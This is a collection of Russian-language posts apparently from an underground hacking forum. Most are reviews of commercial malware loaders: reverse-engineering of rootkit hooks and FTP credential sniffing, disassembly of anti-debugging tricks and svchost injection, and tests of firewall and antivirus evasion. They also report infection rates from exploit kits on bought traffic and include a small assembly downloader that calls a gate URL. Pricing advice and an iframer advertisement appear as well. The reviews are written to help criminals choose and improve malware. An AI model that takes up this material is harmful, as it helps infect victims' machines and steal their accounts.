Как уже наверное стало понятно в обработчиках reg и file функций лочатся/скрываются ключи/файлы c именами ntdevice, userinit и как это не удивительно pizda_. В обработчике TerminateProcess не дают грохнуть процесс с именами ntdevice и userinit, ну и самое интересно собственно в хуке NtDeviceIoControlFile там ловится IoControlCode AFD_SEND и тем самым получается весь исходящий трафик, в котором ловятся USER/PASS получается фтп снифер.

На последок хотелось бы выделить несколько моментов:
- трой содержит длл которая дропается на винт, что создаст море проблем юзерам троя
- используется очень уж очевидный инжект, в котором даже видно путь к файлу длл которая ставит хуки
- давным давно скрытие процессов палилось несколькими ав, которые в принципе не должны этим заниматься, сейчас же будущие антируткиты в ав уже не редкость, имхо все это скрытие только будет способствовать палеву бота нежели поможет ему ... имхо лучше ваще ничего не скрывать, а лочить доступ
- не надежные хуки, без особых усилий можно обрушить процесс послав в хукнутые апи неправильные параметры.
- раз уж делается инжект зачем стучать на серв из главного процесса который по сути не обойдет даже встроенный в винду фаер.
- и да на моей виртуалке все это дело падает при выключение винды.

Я мог бы закинуть еще базы ida, но не уверен что это можно делать.

--------------==Тесты==------------
Благодаря тому, что все наши замечательные криптеры дружно свалили на йух, времени на рассматривание файла у меня было очень много.
И я первым делом взялся за тесты на фаерволы. Ну, как бы, любой лоадер в первую очередь должен уметь обходить фаерволы и тянуть нашу малварю, несмотря ни на что, на компьютер жертвы.

Тест на фаерволы проводился под winXP SP3 (сборка Philka), под админской учетной записью на виртуальной машине.
agava firewall - палит (стандартная установка. Со всем соглашаюсь. Автоматом ставит антиспай и антиспам модули. Уровень защиты приложений - ставлю высокий. Там на выбор три варианта. Я как пользователь ессно требую самый высокий. )
ashampo - палит. (все по дэфолту)
comodo firewall - палит, но тут еще пришлось прилично постараться чтобы запустить его. Добрый дядя комод как на исповеди рассказывал все что этот файл делает. (все по дэфолту)
f-secure - не палит. (все по дэфолту)
KIS11 - палит. (все по дэфолту)
outpost 7 - палит (все по дэфолту)
Zonealarm - палит (все по дэфолту)

После запуска лоадера возникает ошибка при выключении компьютера. При последующем включении-выключении ошибка не выскакивает.
Рис.9
Аналогичная ошибка возникала у нашего реверсера при тестах.


Test1
Получив криптованный файл (слава богу есть еще нормальные люди на этом форуме) ставлю на прогруз.
В первом тесте решил грузить со связки. Ну, а как всем давно известно, я юзаю элеонору.

отгружено со связки: 239
Отстучалось в стату: 101
Отстук: 42,3%
Рис.10 | Рис.11 | Рис.12 | Рис.13

Не долго думая ставлю на прогруз моего любимого стукача.
Для тех кто не вкурсе что это такое - это 15 строчек на ASM-е без всяких там обходов и прочей хренотени. Просто тупая и простейшая стучалка на гейт.

.386
.model flat, stdcall
option casemap :none

include windows.inc
include urlmon.inc
include kernel32.inc

includelib urlmon.lib
includelib kernel32.lib

.code
url db "http://gate.com/",0

Main proc
invoke  URLDownloadToFile,0,addr url,0,0,0
invoke  ExitProcess,0
Main endp
end Main

Отгружено лоадером: 83
Отстучалось: 80
Отстук: 96%
Рис.14

Test2
Ну и намучался я в этом тесте... Суть в чем. Было у меня подготовлено 2 криптованных файла. Один был чистый (с которым я и работал), второй палился парой АВ. Ставлю на прогруз. Грузится по лоадеру 200 ботов, а отстука НОЛЬ. Я в панике начинаю рвать волосы на ректальном отверстии. Беру второй криптованный билд. Ситуация не изменяется. Тут меня окончательно переклинило. Думаю: "наверное админка навернулась". Ставлю некриптованный билд на прогруз - и ОНО ЗАРАБОТАЛО. т.е. по каким-то причинам оба криптованных файла наотрез отказывались работать через сторонний лоадер.
Попсиховал я малость и решил теститься на некриптованном. Ну что поделаешь. Не судьба наверное.

Отгружено с лоадера: 270
Отстучалось в стату: 327
Отстук: 121%
Рис.15 (стата начало) | Рис.16 (стата конец) | Рис.11 (стата До) | Рис.17 (Стата После)
Смотрю я на полученный результат и оплываю. Не стыкуется у меня что-то математика. Вышел, покурил, пересчитал еще раз. Все правильно. Врет админка.
И тут я вспоминаю про свои тесты с криптованным файлом. Думаю что какие-то из прогруженных ботов вероятно отстучались. Поэтому перебор. Ладно. Повторим этот тест чуть позже.

Test3
Не понравилось мне что отстук со связки, оказался в районе 42%. Решил опять стукачом проверить все.
Ставлю для сравнения на связку стукача.

отгружено со связки: 108
Отстучалось в стату: 94
Отстук: 87%
Рис.18

Ну как так? Голимых 15 строк выдают результат в два раза выше чем лоадер!!! Ну где логика?

Test4
Ладно думаю. Пора опять к лоадеру вернуться. Попросил еще одного знакомого криптануть файл своими методами.
Опять ставлю на лоадер грузиться нашего подопытного, но уже криптованного.

Отгружено с лоадера: 103
Отстучалось в стату: 20
Отстук: 19,4%
Рис.18 (лоадер_старт) | Рис.19 (лоадер_стоп) | Рис.17 (стата ДО) | Рис.20 (стата после)
Что же у нас получается. В первом тесте лоадер с лоадера 121% а в этом тесте 19,4%. Ну не может такого быть. Не логично. Лоадер с лоадера должен полюбому быть ВЫШЕ чем со связки - это раз. И полюбому больше 60% - это два.


Test5
Решаю подождать и еще раз повторить тест с некриптованным билдом.
Жду 20 минут и снова ставлю.

Отгружено с лоадера: 100
Отстучалось в стату: 121
Отстук: 121%
Рис.21 (Стата начало) | Рис.22 (стата конец) | Рис.23 (лоадер ДО) | Рис.24 (Лоадер после)
Опять двадцать пять. И опять эти 121%. Откуда они берутся- не понятно.
Информирую о проблеме автора. Продолжаю теститься.

Test6
Вспоминаю показатели стукача. Смотрю на отстук лоадера. Неправильно. Решаю проверить еще один вариант. Ну допустим у меня некорректный крипт. Ну всякое бывает. Решаю прогрузить некриптованный билд со связки.

Отгружено со связки: 100
Отстучалось в стату: 52
Отстук: 52%
Рис.25 | Рис.26 | Рис.27
По результатам этого теста становится видно, что отстук возрос. Не супер-пупер, но возрос. 42,3% против 52%. Вот вам и крипт. Стараемся чиститься, меньше палиться, а в итоге что получаем?

Test7
Это так называемый тест временем.
Я сделал два контрольных скрина админки что бы посмотреть что у меня останется через сутки или двое из живых ботов.
Через 24 часа Рис.28
Через 48 часов Рис.29

--------------==FTP Граббер==------------
Изначально я был в жутком гневе. Вместо распрекрастных ftp мне начали сыпаться e-mail аккаунты пользователей. Пробовал юзать как ftp - не катит. Если заходить на мыльник - катит.
Написал гневное сообщение автору. Автор, кстати, был удивлен такому повороту событий.
Далее я забил на это дело болт. Как оказывается ЗРЯ!
Спустя некоторое время, зайдя в раздел сс FTP увидел заветную надпись valid. Рис.30
т.е. лоадер грабит и ftp и e-mail аккаунты. И постепенно их чекает. И как оказалось - удачно.
На текущий момент (сутки после прогруза) у меня в админке 16 валидных ftp.
Экспорт работает отлично. Рис.31

Единственное что не понравилось - это неудобный список ftp.
Я бы увеличил с 2 отображаемых строк до 50 хотя бы.
Ну или отдельные закладки для валид/невалид в этом подпункте меню.

--------------==Фейк==------------
Решил испытать и этот чудестный модуль в лоадере. Сделал задание Рис.32
А по указанному адресу написал небольшую страничку на HTML и установил код счетчика от гугла.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://gogle.com");
//-->
</script>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-2266865-12']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://gogle.com">
</noscript>
</head>
<body>
Redirecting to server...
</body>
</html>

И как олень ждал от счетчика показателей. Но они никак не появлялись. И только сейчас, при написании обзора, до меня дошло где я ступил. Я первым делом написал location.replace и только после него код счетчика. А это значит что мой счетчик тупо не срабатывал.
Сейчас переделал файлик и о результатах отпишусь через день - два.

--------------==Эпилог==------------
Я обычно не пишу резолюции. Неоднократно обжигаясь на недовольных я перестал это делать. Но все чаще и чаще меня просят их писать. Сегодня я вставлю свои пять копеек.

Итак, подводя итоги:
Недостатки:
1. нет обходов фаерволов.
2. имеет на борту dll которая будет дропаться на винт некриптованная. И соответственно палить загрузки.
3. невысокий процент отстука со связки.
4. некоторые недочеты в админке.

Достоинства:
1. Лоадер неплох в отношении доставки и запуска файлов. Отстук с него чудесный. т.е. свою основную функцию он выполняет отлично.
2. Админка не создает нагрузки на сервер. В процессе тестов я поглядывал на показатели загруженности и все было ровно.

Пожелания:
Я вижу проделанную работу. Я нисколько не хочу обидеть автора или выразить ему неуважение в профессионализме. НО лоадер определенно требует доработки. В первую очередь я рекомендую вам поработать над самим билдом. м.б. стоит отказаться от dll? Она очень сильно будет "портить малину". Так же обратите внимание на используемые способы интеграции в систему. Есть узкие места и вы о них знаете. Ну и проверьте что происходит с отстуком в админку. Откуда 121%?

Меня однажды автор просил прикинуть цену этого лоадера. Я рекомендую установить на текущий момент ценник не выше 600$. После финальных доработок и устранения указанных мной недостатков цену можно будет держать в районе 800-1200$ в зависимости от спроса и показателей.

Теперь что касается моего мнения об авторе.
В разговоре был учтив. Закидонов небыло. Писал без ошибок (не в обиду, но школьники 7-10 класс достали уже). Был учтив. Мне очень понравился.

Ну и хочется ответить на возникших у многих вопрос о выборе мною логотипа и названия статьи. Дело в том, что у данного лоадера сейчас пока нет названия. А мои подозрения о попытке барыжнечества el- развеял напрочь. Автор написал сам этот лоадер и это не модификация многим известного myLoader. Вот отсюда и родилась, собственно, идея.

--------------==Благодарности==------------
В первую очередь выражаю благодарность автору за предоставленный на обзор материал.
Отдельно хочу поблагодарить реверсера и "соучасника" EL-. Спасибо тебе огромное.
Так же хочется сказать спасибо HTC, Demien, Михрютка, Exmanoize. Ребята! Спасибо что вы есть и спасибо что поддерживаете меня.
Ну и конечно же СПАСИБО всем, кто читает мои обзоры.

p.s. Записки на полях, специально для xss.pro/

 

[Ar3s]

Отныне всем желающим прикупить Ziframer 2.* от Zer0 будет предоставляться автором скидка в размере 30% при сообщении контрольной фразы "я с xss.pro/" и наличии вашей реги у нас на форуме!

Почитать о товаре можно здесь.

 

[Ar3s]

C:\Documents and Settings\Ar3s>ping -t xss.pro/

Обмен пакетами с xss.pro/ [92.241.162.45] по 32 байт:

Превышен интервал ожидания для запроса.
Превышен интервал ожидания для запроса.
Превышен интервал ожидания для запроса.

Статистика Ping для 92.241.162.45:
Пакетов: отправлено = 4, получено = 0, потеряно = 4 (100% потерь),


Ну вот и началось...



Это пока шутка, которая вполне после этого обзора могла стать реальностью. В результате моих "раскопок" вылезло много разных моментов. но обо всем по-порядку.

На "операционном столе" новый продукт. Dloader

Официальный топ тут.
В котором дано следующее описание:[New$paN]

DLoader - это недорогой комплект программного обеспечения для эффективного бизнеса в сети. С помощью него, вы сможете грузить параллельно до 10 файлов одновременно,
повышая конвертируемость вашего траффика. Это не резидент, а разовый лоадер.

[ + ] Простота установки и настройки админ панели;
[ + ] Интуитивно понятный интерфейс админки;
[ + ] Фильтр по распределения загрузок по странам;
[ + ] Оптимизированная работа с базой данных;
[ + ] После срабатывания лоадера, он самоудаляется без создания батника и подобных бредовых методов;
[ + ] Отстук на стату при успешном запуске файла (ведение статистики не только по скачкам, но и по успешным инсталам);
[ + ] Не содержит в себе dll библиотеки и легко поддается крипту, то есть при наличии хорошего криптора, вы можете криптовать свой билд сами;
[ + ] Малый размер билда ~5кб.;
[*] Так же по просьбам клиентов буду расширять функциональность или изменять продукт.

Скриншот администраторской панели http://img72.imageshack.us/img72/1561/dloader.png

Тестировался на обходы на следующем программном обеспечении:
01. Outpost Security Suite Pro 7 - обошел (даже на самых параноидальных настройках) (автоматическое созданий правил, пользователь повлиять не может)
02. Comodo - обошел
03. KIS - не обошел
04. Ashampoo - обошел
05. Agava - обошел
06. F-Secure - обошел
07. ZoneAlarm - обошел
08. SunBelt - обошел
09. Norton Internet Security 2011 - обошел
10. Eset NOD32 4 - обошел
Тестирование на программах под номерами 9, 10 производилось мною лично, как будет больше времени
на тесты, пополню этот список.
Со временем будет вестись работа над увеличением эффективности.

Тестировался на работу в системах:
Windows XP - сработал
Windows 2003 - сработал
Windows Vista - сработал
Windows 7 - сработал

Видео по работе во всех системах, обход UAC и некоторых защит (все записать просто физически невозможно).
http://www.sendspace.com/file/43j4m2 (простите за качество, уж как смог)

Отстук ~80%.

Благодаря гибким ценам продукт доступен каждому!
Стоимость лицензии для одного лица: 250$
Ребилд: 20$ (без чистки)
Чистку на данный момент не произвожу.

Контакт.
ICQ#: 383849

Связался с автором получил билд и понеслось.
Размер билда 3 584 байта.
Написан на ассемблере
Некриптованный билд палят 7 / 38 по результатам виртеста.

Админка написана на PHP. Установка без инсталлятора. Время затраченное на установку админки - минут 5.
Основное меню | Задачи | Настройки

---===Отдаем билд на реверс===---
Ну чтож, приступим к изучению, основываясь на описании продукта.
Малый размер билда ~4кб. Билд, который попал ко мне весил всего 3.5 кб. Открвая PEID'ом
видим, что в файле всего одна секция,смотрим версию линкера и видим 1.69. Кэп намекает, что
файл собран на фасме (как позже выяснится с применением макросов). Ладно, пора заглянуть внутрь
Недалеко от точки входа видим цикл

00401017  |> /70 00         /JO SHORT 00401019
00401019  |> |81748B FC 2D8 |XOR DWORD PTR DS:[ECX*4+EBX-4],1838832D
00401021  |. |74 00         |JE SHORT 00401023
00401023  |> |83E9 01       |SUB ECX,1
00401026  |.^\75 EF         \JNE SHORT 00401017
00401028  |.  83E1 FF       AND ECX,FFFFFFFF
0040102B  |.  FFD3          CALL EBX

Можно не ждать пока файл расшифруется, а просто остановится на CALL EBX и перейти на следующую
стадию. Тут уже поинтересней. Фишка кроется тут:

00401055    8D7D 0A         LEA EDI,[EBP+0A]
00401058    B9 19000000     MOV ECX,19
0040105D    F3:AA           REP STOS BYTE PTR ES:[EDI]
0040105F    6200            BOUND EAX,QWORD PTR DS:[EAX]
00401061    0000            ADD BYTE PTR DS:[EAX],AL
00401063    C031 C0         SAL BYTE PTR DS:[ECX],0C0                  ; Shift out of range
00401066    4F              DEC EDI
00401067    8B40 18         MOV EAX,DWORD PTR DS:[EAX+18]

если быть более точным, в особенности работы конструкции REP STOS
Заполнение памяти будет продолжаться даже после перезаписи выполняемого кода в памяти.
Таким образом, если ктото трассирует программу то она выйдет из под контроля
но посмотрим чуть ниже и увидим

00401066    64:8B40 18      MOV EAX,DWORD PTR FS:[EAX+18];TEB
0040106A    8B40 30         MOV EAX,DWORD PTR DS:[EAX+30]
0040106D    8B40 0C         MOV EAX,DWORD PTR DS:[EAX+0C]

поставим точку останова сюда, и получим измененный код

0040105F    83ED 07         SUB EBP,7
00401062    31C0            XOR EAX,EAX
00401064    31C0            XOR EAX,EAX
00401066    64:8B40 18      MOV EAX,DWORD PTR FS:[EAX+18]
0040106A    8B40 30         MOV EAX,DWORD PTR DS:[EAX+30]
0040106D    8B40 0C         MOV EAX,DWORD PTR DS:[EAX+0C]

Казалось бы метода новая, но гдето она уже проскакивало. Поискав на васме находим.
Там дана интересная задача и описана работа
конструкции. Также описание можно найти в мануалах интела. Дальше код начинает восстанавливать
API по хешам самым обычным методом. Код здесь я не привожу, ибо его можно найти в гугле за пару
минут. После получения адресов функций лоадер получает текущее имя файла. Сделано это чтобы потом
куда-нибудь его подальше спрятать, например во временный каталог.

Ну а дальше самое интересное. Описано аж 10 фаерволлов, которые софт вроде как успешно обошел.
Посмотрим на одей метод:
Лоадер создает процесс svchost.exe с флагом CREATE_SUSPENDED. Это означает, что процесс выполнятся не
будет до тех пор, пока не будет запущен его первичный поток (это должны сделать мы).
Далее происходит маппинг секции с шеллкодом в адресное пространство нашего svchost с помощью
функции ZwMapViewOfSection. Посылаем асинхронный вызов процедур в процесс svchost. Возобновим замороженный
процесс и наш код будет выполнен. Продвинутый читатель вспомнит и скажет "а гдето вроде такое я читал".
Ну чтож link. Описание метода один в один. Дальше больше. Такой же метод используется
в myloader и в полуприватном лоадере с названием 2к8! Да, вы не ослышались, техника примерно 2007 года.
Работает ли оно на обход спросите вы? Весьма сомнительно,если правила для файрволла не заданы автоматически.

Не знаю, что проверял \х45\х50, но мой аутпост блокирует даже создание процесса. Скорее всего Остальные тоже,
достаточно посмотреть список того что похукано в SDT. А функции что использованы выше точно
пристутствуют в аутпосте и полследнем NIS (проверялось мной лично). Итак, отличия в обходе от других
продуктов минимальны. Единственный плюс в том, что секция с шеллкодом не сохраняется на диск (как в 2к8) и
лоадер не содержит длл (как myloader). Что выполняет заинжекченный код я не смотрел, но это не столь важно.
Svchost является для большинства фаерволлов доверенным процессом, из него можно скачивать файлы, запускать их
и делать прочие пакости

Очень неприятно, что нет никаких проверок,выполнился код или нет.
Например

00401110    FF95 F8090 CALL DWORD PTR SS:[EBP+9F8];CreateProcess
00401116    6A 00      PUSH 0
00401118    68 BD06000 PUSH 6BD
0040111D    6A 00      PUSH 0
0040111F    6A 40      PUSH 40
00401121    6A 00      PUSH 0
00401123    6A FF      PUSH -1
00401125    FF95 F4090 CALL DWORD PTR SS:[EBP+9F4]

как видите, после вызова CreateProcess мы не знаем создался процесс или нет, а лишь полагаем что все прошло
успешно. Ну а если не создался, то бог с ним, можно код выполнять дальше, авось и так сойдет.

p.s. Пожалуй автору стоит задуматся над тем, имеет ли смысл антиотладка, ведь она элементарно проходится, ну и актуальность
обходов само собой.

В топе на вхб проскакивали заявления типа "GoLoad, опять ты". Спешу вас обрадовать что это не один и тотже продукт,
в голоде другой обход, другие методы.

---===Беремся за обходы===---
Ставим виртуалку, скачиваем с сайтов производителей последние версии фаерволов и поехали.

Все тесты проводились на WinXP SP3 сборка philka под админской учеткой.
Все тесты проводились на НЕКРИПТОВАННОМ билде, дабы откинуть фактор (возможный) влияния крипта на результаты тестов.

1. запуск чистого некриптованного билда. Через лоадер гружу стукача. - Удачно
2. agava firewall (все по дэфолту. spamprotects и antispy ставятся по умолчанию) - палит Рис.1
3. ashampo (единственное что выбрал - упрощенный режим) - палит. Рис.2
4. comodo internet security V4.1.149672.916 (без обновления антивирусных баз) - палит. Выключаю sandbox - палит инжект. Рис.3 Рис.4
5. F-Secure internet security (пока я курил установился автоматом, ввел только пароль родительского контроля. Ограничения на содержание сайтов оставил по дэфолту, обновление баз не делал) - Палит Рис.5
6. KIS 11.0.1.401 - даже без обновлений спалил файл. Добавил файл в исключения в антивирусе, надо же на фаерволе провериться. Как я ни старался - на дэфолтных настройках запустить этот лоадер не удалось. Даже при выключенных всех типах защиты, кроме фаервола, файл все-равно блокирвался куда бы я его не заливал. - неизвестно. (хотя мой вердикт - нет) Рис.6 Рис.7
7. Outpost Security Suite 7.0.3 (выбрал простой режим при инстале, базы обновились автоматом) - палит, но в режиме автосоздания правил пропускает и информирует пользователя. Рис.8 Рис.9
8. Zone Alarm (все по дэфолту) - палит. Рис.10
9. Norton Internet Security - палит sonar. Выключаю для пробы антивирус и оставляю только фаервол - пропускает. т.е. при крипте файл сработает. Рис.11 Рис.12
10. NOD32 - в полном комплекте палит АВ. Если выключить АВ и проверить чисто на фаерволе - палит. Вернее в фоновом режиме блокирует. Рис.13


---===Криптуемся и переходим к тестам===---
Тут хочется сказать пару слов:
1. Крипторы-крипторы. Я больше в жизни не буду вас рекламировать и советовать. Еще вчера вас был вагон и две тележки. В некоторых я был уверен как в том, что чак норис может взглядом луну с орбиты сдвинуть, а сегодня вас не найти. Вообще никого. Долбанную неделю я шарился по всей сети в поисках. В итоге криптанулся у абсолютно нового чела и всего за 10$. Ну не херня ли? Проверка файла.
2. Метод тестов я организовал сделующий: источник_прогруза(связка/лоадер)=>Dloader=>Стукач. В этом случае мы убиваем двух зайцев. Считаем отстук самого лоадера с прогруза и считаем отстук стукача с лоадера. И получаем на выходе два результата которые и будем сравнивать от теста к тесту.


---===Тест #1===---
Прогруз лоадера с лоадера
Для теста я использовал предоставленный HTC ботнет.

отгружено по стате 129
отстучалось 131
процент отстука 101,5%
Судя по стате лоадера НТС - должно было отстучаться 94,3% = 121 бот
Рис.14 Рис.15 Рис.16

Интересный процент отстука. Верно? И не понятно почему. Я думал изначально что баги нет. И совершенно случайно вдруг отстучались боты с которыми я баловался ранее или неправильно считает лодырь НТС. Но после некоторых раздумий пришел к выводу ,что это не так. Предварительные мои тесты дали бы +2, +4 бота. И даже если плюсануть 121+4= 125, но не 129. Да и не могли они все именно в этот момент "ожить". Думаю нужно пересмотреть админку. Где-то есть подвох.

отгружено с лоадера 127
отстучалось 124
процент отстука 97,6%
Рис.16 Рис.17

---===Тест #2===---
Грузимся со связки феникс. Траф покупаю у d33

отгружено 737
отстучалось 527
процент отстука 71,5%
Рис.18 Рис.19 Рис.20 рис.21

Тут вылазит вторая бага админки. Я заметил ее еще при пробном запуске. В админке 1 бот, а запусков файла - 10. Рис.22 Значит нет проверки на повторные запуски. Сообщаю об этом автору. Он говорит что уже понял это и дорабатывает этот момент.
Поэтому отгружено с лоадера, будем считать по максимуму = 527
отстучалось 457
процент отстука 86,7%
рис.21

---===Тест #3===---
Грузимся на связке элеонора. Траф покупаю у d33

отгружено 102
отстучалось 63
процент отстука 61,8%
Рис.23 Рис.24

Как видим бага и тут вылезла.
отгружено с лоадера будем считать по максимуму 63
отстучалось 56
процент отстука 88,9%
Рис.24

----------------------------------------
Теперь давайте выведем средние показатели.
Отстук файла с лоадера - ну не 101,5%. Я думаю в районе 95%. Это если учесть отстук стукача с лоадера.
Отстук со связки средний 66,7%

Отстук файла с лоадера средний 91%. (напомню, что грузился просто стукач.)
---------------------------------------

---===Разбор полетов===---

1. Обходов нет, а отстук довольно высокий. Почему?
Причин несколько:
1. файл не палится АВ.
2. размер файла очень мал. Написан на FASM, поэтому в файле нет ничего лишнего.
3. Машины на которые он грузился в своем большинстве не имели фаерволов.

2. Обходов нет. Лодырь говно!
Нет и нет. Задолбали меня такие выкрики. Чего вам свет клином на обходах сошелся? Обходы - это хорошо если работать по определенным целям. А если грузиться массово, да еще и по такой цене - то вполне юзабельно. Смотрите на показатели, на отстук. Нормальный лодырь. Автор, кстати, очень доволен остался реверсом!!!!! Заметьте. Не кричал подъеба, суки! Он сказал спасибо. "Я знаю куда мне стоит теперь обратить внимание и где стоит поработать" Я так же сообщил обо всех найденных мной недоработках, на что мне ответили, что найденные баги в админке уже фиксятся. А результаты моих тестов подталкивают к улучшению продукта и мозговой активности.
В любом случае. Я уверен что лоадер стоит своих денег! Как сказал один мой знакомый: "я за чистку криптора больше беру".

3. Маленький размер файла, быстро спалят.
Тут ситуация двояка. Да, спалить такой файл можно довольно быстро, но ввиду небольшого размера его и почистить автору очень не сложно будет. Можно через день проворачивать такое. Пока фантазии будет хватать.

4. АХАХАХА феникс лучше Элеоноры. Уделали конкретно!
Спешу огорчить любителей холивара. Это все временная фигня. Во время моего теста феникс получил на борт все обновления. Я был в числе первых (спасибо alexudakov за связку) кто грузился на новой версии. Элеонора же, довольно давно не обновлялась. Только чистки.
После тестов я связывался с автором феникса. Мы довольно долгое время беседовали по-теме и просто ни-о-чем. И мне понравилось его отношение к Exmanoize. Оно в целом соответствует моему:

5777677 (00:59:02 6/10/2010) я думал вы соперничаете...
-
outfoxtrot (00:59:33 6/10/2010) мне как бы пох, $ хватает, за мультами не рвусь
даже буровит кто если в его топе что мол покупайте феникс то пишу что мол у меня пробив щас на высоте. завтра у него, так что мол х#йня это все
обе связки норм, и если был бы клиентом то взял бы обе )))

А так же хочу, по-случаю, всем сообщить что на подходе новая версия Элеоноры.

5. Как получилось так, что на WBX обходы есть, а в моем обзоре их нет?
Я не знаю. На самом деле все происходило довольно запутанно. После того как я на одном закрытом форуме выложил результаты своих тестов - они быстро появились в топе на WBX. С заголовком будьте аккуратны. Проверка сделанная x45x50 была тут же анулирована им самим. У меня в асе творился некоторое время полный пи... Кто-то обвинял автора, что он сам изменил в своем топе проверку от x45x50 в свою пользу. Кто-то обвинял x45x50 в некомпетентности и взыманию бабла ни за что. Меня это достало. Я вам проще скажу. Я не мировой судья. Мне глубоко фиолетово кто и кого там обманул. Я не буду лезть в эти разборы.

6. В результате опубликованных мной на закрытом форуме тестов на обходы пострадало (в какой-то степени) два человека. Ребята. Ничего личного. Меня попросили выложить. Я выложил. После разговора с одним из вас и услышанными извинениями, а так же убранным материалом на WBX у меня претензий не осталось.

--------------------P.S.---------------------------
Как всегда в конце своих обзоров я выражаю благодарности. Все чаще я хочу указать огромное количество ников, которые так или иначе мне помогают, но это превратится в хрен знает что.
Итак: EL-, HTC, Exmanoize, Alexudakov, Ragnar. Это люди которые мне реально помогли. Так же благодарю xss.pro/ и exploit.in за моральную поддержку.

Отдельно хочется выразить благодарность автору за предоставленный лоадер. Хочется сказать, что осталось от сотрудничества исключительно положительная эмоция. Радовал постоянный онлайн и всевозможная помощь в любое время суток. Спасибо.

Записки на полях специально для xss.pro/

 

[Ar3s]

Доброго времени суток уважаемые мемберы damagelab!!!
Захотел разобрать сэмпл Dragon pack, который был снят in the wild.
Исследование будет проводиться с User Agent:Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

Автор - gooner
Читать - здесь[New$paN]

 

[Ar3s]

Уважаемые пользователи и гости форума! От чистого сердца поздравляю вас с наступающим новым годом!

Оглядываясь на уходящий 2010 год хочу отметить, что он был не плох. Мы окончательно сформировали новый костяк форума. Устояли в очередной раз перед всеми проблемами, несмотря на заверения многих и многих мы не закрылись. А двинулись вперед (не такими быстрыми темпами как мне бы того хотелось), но уверенно и четко представляя себе чего все же хотим добиться!
Потеряли, да именно так, нескольких крайне толковых людей. О чем я неоднократно жалел. Но причины по которым они ушли мне не известны. Взамен же к нам пришли новые люди, которые уже успели себя зарекомендовать с очень хорошей стороны.

Отдельно хочу отметить всех тех кто мне и форуму так или иначе помогал:
EL- - дружище! Спасибо тебе огромнейшее. Ты один из немногих кто помогал почти всегда и модерил несмотря на все невзгоды.
DeusTirael - я очень рад что ты вернулся. Надеюсь мы и дальше будем творить качественные обзоры.
Gooner - наш новый супермод! Огромный тебе респект. Продолжай в том же духе. Твой код часто мне помогал. У тебя замечательные способности и я буду рад помочь тебе в любой момент!
TrueUser - молодца! Как уже было сказано, ты даже не модер, но ведь и не нужно. Твои советы помогали очень и очень многим, твои комменты напрочь вгоняли в ступор школоту Ты поддерживал и меня и наших общих знакомых в самые трудные минуты, несмотря на твои собственные трудности в реалке!
Karabas-Barabas - мне иногда тебя стукнуть хочется Но я очень благодарен тебе. Я с удовольствием поучаствую и дальше в самых разнообразных тестах на отстуки, прогрузы и т.д. Вы вдвоем с TrueUser негласные наши супермоды. СПАСИБО! (если захотите - выдам модеров в любом разделе! Только дайте знать)
Chococream - Ты в последнее время стал двигателем форума. Человек который не сидит на месте. Спасиб!
Exmanoize - тебя я конечно же тоже вспомню. Благодаря тебе держится добрая половина моих проверок. Успехов и процветания твоему делу. Всегда рад пообщаться с тобой в жабе. И не обязательно на деловые темы. Удачного тебе переезда!
Zer0, Dragon_x, G100M, DiFor, DarckSol, Pernat1y, Schtirliz - ребята! Спасибо вам за все. За помощь, за участие, за материалы и подсказки, за беседы в асе/жабе/форуме!
И огромное спасибо всем-всем кого я почему-то забыл отметить отдельно! Почаще заходите к нам. И мы постараемся помочь вам советом или поучаствовать в ваших начинаниях и т.д. Я всегда искренне радуюсь когда на форуме много непрочитанных сообщений и огорчаюсь, если это очередной спамер хайд вскрывает

Что принесет нам 2011 год? - я надеюсь только положительные эмоции, интересные темы для обсуждения и качественный рост наших знаний. Я думаю что немало еще интересных людей зайдет к нам на огонек и, надеюсь, останутся здесь. Удачи всем нам на следующий год и много-много ништяков. Всех вас очень люблю. С наступающим!

p.s. Winux - тебя я тоже не забыл. Решил приберечь напоследок! Спасибо. Благодаря тебе мы все здесь!

 

[Ar3s]

Независимые специалисты по информационной безопасности накануне сообщили о существовании в Windows очередной опасной уязвимости, позволяющей удаленно получать контроль над персональным компьютером пользователя и использовать его в своих целях. В Microsoft говорят, что получили данную информацию и приступили к расследованию инцидента.

"Microsoft расследует публичные утверждения о потенциальной уязвимости в системе Windows SMB (Server Message Block). После завершения расследования, мы примем надлежащие меры для защиты наших клиентов. Среди таких мер может быть включение исправления в рамках ежемесячных наборов патчей, либо экстренный выпуск исправления или же документ с рекомендацией о том, как клиенты могут защититься от данной уязвимости", - говорит Джерри Брайент, менеджер Microsoft Security Responce Center.

В начале недели независимый технический специалист, скрывающийся под ником Cupidon-3005 опубликовал код эксплоита для уязвимости в функции BrowserWriteErrorLogEntry() в файле mrxsmb.sys. Этот файл является драйвером, запрашивающим подключение по протоколу Server Message Block в Windows. Напомним, что протокол SMB применяется в Windows для совместного доступа к файлам и принтерам в Windows.

Во французской исследовательской компании Vupen говорят, что исследовали баг и характеризуют его как "критический", так как его воздействие ставит под угрозу безопасность всей системы и делает возможным получение полного контроля над ней. Датская компания Secunia характеризует баг как уязвимость "средней критичности". Здесь говорят, что атака приводит к переполнению буфера, если в строке Server Name передается слишком длинный параметр в рамках пакета Browser Election Request. Точно установлено, что уязвимости подвержены Windows XP SP3 и Windows Server 2003 SP2. Другие версии ОС также могут быть под угрозой.

Напомним, что следующий ежемесячный патч Microsoft планирует выпустить 8 марта.

Код эксплоита.
Источник новости.

 

[Ar3s]

В февральский день за шумом вьюги не слышно грохота побед.
Девченки дарят нам шампуни, а нам хотелось бы минет!

С праздником вас!

 

[Ar3s]

Внимание!
На форуме проводится чистка пользователей.
В данный момент я удаляю привилегии у неактивных ВИПов, модеров и других пользователей с повышенным доступом.
Если вы зашли на форум и заметили, что я вас по ошибке понизил в привилегиях - напишите мне об этом. Решим.

В ближайшее время буду проводить чистку пользователей с последним заходом более года назад. У вас есть еще время оживить свои аккаунты!